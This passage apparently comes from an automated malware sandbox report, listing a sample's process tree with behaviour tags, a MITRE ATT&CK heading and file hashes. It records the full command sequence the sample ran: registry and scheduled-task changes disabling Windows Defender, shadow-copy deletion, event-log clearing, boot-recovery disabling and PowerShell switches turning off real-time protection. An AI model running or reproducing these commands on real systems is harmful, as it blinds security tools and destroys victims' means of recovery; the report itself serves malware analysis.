- Modifies Windows Defender Real-time Protection settings
PID:1740
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:940
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:808
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1276
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:380
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1580
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:512
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1376
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:680
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1412
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1208
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1980
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:684
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2032
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:276
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1116
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1428
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1728
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:728
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1708
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:336
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:916
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1408
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1792
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1604
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1300
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1160
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1812
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1768
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5518486dffec7d61e97730f9dc6c24aaa
SHA16198cb33b781deec8a1e9b538a57b04704057343
SHA256f109291c5abe9f0acd84f50f989803423c862aca638978f6b111b65d486abfba
SHA512c5cb08510662c00356f75b396e186ed5da16e08c4ed34226531401fa22eff925ba2f92a559a73299df68b6631812a92c0a944bb958c3563db44e8e43d90462da